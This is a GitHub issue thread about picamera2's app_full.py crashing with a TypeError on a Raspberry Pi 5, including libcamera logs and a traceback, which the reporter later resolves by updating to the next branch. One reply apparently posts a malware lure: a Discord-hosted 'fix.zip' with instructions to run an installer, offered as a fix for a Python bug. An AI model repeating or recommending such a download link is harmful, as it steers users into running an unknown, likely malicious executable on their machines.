raspberrypi/picamera2 #1104: [BUG]app_full.py no longer works

pbaetens, 2024-09-03:
using latest libcamera + picamera2 compiled from latest git repo:

```

(venv) pi@raspberry5:~/ams_rpi_software/picamera2/apps $ python app_full.py 
[0:03:30.215154970] [2843]  INFO Camera camera_manager.cpp:316 libcamera v0.3.1+49-48fe316f-dirty (2024-09-03T14:54:10CEST)
[0:03:30.222600884] [2847]  INFO RPI pisp.cpp:695 libpisp version v1.0.7 28196ed6edcf 03-09-2024 (14:16:52)
[0:03:30.223363127] [2847]  WARN CameraSensorProperties camera_sensor_properties.cpp:505 No static properties available for 'mira220color'
[0:03:30.223373757] [2847]  WARN CameraSensorProperties camera_sensor_properties.cpp:507 Please consider updating the camera sensor properties database
[0:03:30.228783478] [2847]  INFO RPI pisp.cpp:1154 Registered camera /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 to CFE device /dev/media3 and ISP device /dev/media0 using PiSP variant BCM2712_C0
[0:03:30.229684703] [2843]  INFO Camera camera_manager.cpp:316 libcamera v0.3.1+49-48fe316f-dirty (2024-09-03T14:54:10CEST)
[0:03:30.237492211] [2850]  INFO RPI pisp.cpp:695 libpisp version v1.0.7 28196ed6edcf 03-09-2024 (14:16:52)
[0:03:30.238353788] [2850]  WARN CameraSensorProperties camera_sensor_properties.cpp:505 No static properties available for 'mira220color'
[0:03:30.238369121] [2850]  WARN CameraSensorProperties camera_sensor_properties.cpp:507 Please consider updating the camera sensor properties database
[0:03:30.243840861] [2850]  INFO RPI pisp.cpp:1154 Registered camera /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 to CFE device /dev/media3 and ISP device /dev/media0 using PiSP variant BCM2712_C0
[0:03:30.248544062] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 1600x1400-BGR888 (1) 1600x1400-YUV420 (2) 1600x1400-GRBG_PISP_COMP1
[0:03:30.248705526] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 1600x1400-SGRBG12_1X12 - Selected CFE format: 1600x1400-PC1G
[0:03:30.259671340] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 640x480-XBGR8888 (1) 640x480-GRBG_PISP_COMP1
[0:03:30.260253138] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 640x480-SGRBG10_1X10 - Selected CFE format: 640x480-PC1G
[0:03:30.264700449] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 640x480-XBGR8888 (1) 1600x1400-GRBG_PISP_COMP1
[0:03:30.264899635] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 1600x1400-SGRBG10_1X10 - Selected CFE format: 1600x1400-PC1G
[0:03:30.271128674] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 640x480-XBGR8888 (1) 640x480-GRBG_PISP_COMP1
[0:03:30.271352971] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 640x480-SGRBG12_1X12 - Selected CFE format: 640x480-PC1G
[0:03:30.278448550] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 640x480-XBGR8888 (1) 1600x1400-GRBG_PISP_COMP1
[0:03:30.278729292] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 1600x1400-SGRBG12_1X12 - Selected CFE format: 1600x1400-PC1G
[0:03:30.290419997] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 640x480-XBGR8888 (1) 640x480-SGRBG16
[0:03:30.291019777] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 640x480-SGRBG8_1X8 - Selected CFE format: 640x480-GR16
[0:03:30.297258464] [2843]  INFO Camera camera.cpp:1191 configuring streams: (0) 640x480-XBGR8888 (1) 1600x1400-SGRBG16
[0:03:30.297429261] [2850]  INFO RPI pisp.cpp:1450 Sensor: /base/axi/pcie@120000/rp1/i2c@80000/mira220@54 - Selected sensor format: 1600x1400-SGRBG8_1X8 - Selected CFE format: 1600x1400-GR16
QStandardPaths: wrong permissions on runtime directory /run/user/1000, 0770 instead of 0700
Traceback (most recent call last):
  File "/home/pi/ams_rpi_software/picamera2/apps/app_full.py", line 1197, in <module>
    other_tab = otherTab()
                ^^^^^^^^^^
  File "/home/pi/ams_rpi_software/picamera2/apps/app_full.py", line 837, in __init__
    widget.setMinimum(picam2.camera_controls[control][0])
  File "/home/pi/ams_rpi_software/picamera2/apps/app_full.py", line 475, in setMinimum
    self.box.setMinimum(val)
TypeError: setMinimum(self, min: int): argument 1 has unexpected type 'tuple'

```

Dominic54321, 2024-09-03:
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

pbaetens, 2024-10-31:
fixed using latest picamera2 from next branch.

closed 2024-10-31 by pbaetens